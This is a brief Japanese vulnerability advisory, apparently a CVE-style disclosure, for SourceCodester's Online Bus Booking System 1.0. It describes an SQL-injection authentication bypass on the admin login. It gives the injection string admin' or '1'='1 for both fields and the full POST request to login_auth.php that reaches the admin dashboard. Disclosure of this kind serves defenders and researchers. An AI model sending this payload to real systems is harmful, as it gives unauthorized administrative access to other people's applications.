
Online Bus Booking System 1.0には、admin.phpの管理者ログイン画面において、ユーザー名またはパスワードのSQLインジェクションによる認証バイパスが存在します。
Online Bus Booking System 1.0 には、admin.php の管理ログイン画面で、ユーザー名またはパスワードのSQLインジェクションによる認証バイパスが存在します。
#ベンダー - SourceCodester
#製品 -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#脆弱性タイプ - 認証バイパス
#影響を受けるコンポーネント - bus_booking/admin.php
#攻撃タイプ - ローカル
#権限昇格 - true
#影響: コード実行 - true
攻撃ベクトル
管理ログインパネルに移動し、バイパスを試みる
リクエストペイロードで、以下を設定する
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
管理ダッシュボードへのログインに成功